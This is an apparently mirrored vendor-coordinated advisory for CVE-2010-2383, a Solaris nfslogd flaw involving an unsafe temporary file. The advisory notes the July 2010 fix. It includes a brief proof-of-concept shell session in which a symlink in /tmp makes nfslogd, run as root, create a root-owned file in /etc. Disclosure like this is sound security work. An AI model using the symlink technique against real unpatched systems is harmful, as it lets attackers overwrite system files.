Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24287
HistoryJul 20, 2010 - 12:00 a.m.

CVE-2010-2383: Solaris nfslogd unsafe use of temporary files

2010-07-2000:00:00
vulners.com
6

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Below is the full disclosure information for CVE-2010-2383. It was
reported to [email protected] on 29 December, 2009 and assigned Sun
bug 6913655.

This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).


This one is with nfslogd which allows an unprivileged
user to create/overwrite a file as root:

Don't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx 1 nobody nobody 9 Dec 29 21:24 /tmp/.nfslogd.pid

  • -> /etc/oops
    Don't Panic! # id
    uid=0(root) gid=0(root)
    Don't Panic! # /usr/lib/nfs/nfslogd
    Don't Panic! # ls -dl /etc/oops
  • -rw------- 1 root root 4 Dec 29 21:25 /etc/oops

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTEUK12KGA6cQSpZSAQKDmgf+Khyu8Mq5rk4wKHUGQm4NCZOvC75ilW2e
Nr9dw/YEEDIZZkaGHRRtPD9pBgnrdCbP/Pvt6wSYyr+JOLYCO1BGGFA36eenTgzI
lbpDuFDgpVO4+DPb5TslS1MYkLYYFh+S9l0zzdYGVvAbURabp35VW852O2SHY7Pg
ZsUjRUrbSMIPUcVq024CLtro2VCJPiZ9o691ChpNlkdCTdtS6PUCllwQazz/2UFO
Gf21llPnO7kkQP7zbjbTITx9cjx6hYOxKbfLtrupxjtnXHRIjts0ToFxUYnT5eWD
3I/1m8/VjnqQSIY7nytcIj+nZG1z7e/zhOmdE54wRcpQzONYngNcWA==
=ojGd
-----END PGP SIGNATURE-----

Related for SECURITYVULNS:DOC:24287